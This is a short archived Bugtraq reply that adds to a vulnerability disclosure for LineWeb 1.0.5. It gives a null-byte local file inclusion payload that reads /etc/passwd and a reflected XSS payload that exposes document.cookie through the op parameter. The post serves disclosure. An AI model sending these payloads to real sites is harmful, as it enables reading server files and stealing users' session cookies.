New User, Welcome!     Login

Re: Multiple vulnerabilities in LineWeb 1.0.5



From: ign sec gmail com
To: bugtraq securityfocus com
Cc:
Subject: Re: Multiple vulnerabilities in LineWeb 1.0.5
Date: Wed - Jan 06, 2010 01:46 AM


One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00 

And ?op is vulnerable to a xss attack, IE:
index.php?op=<script>alert(document.cookie)</script>

Ignacio.




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!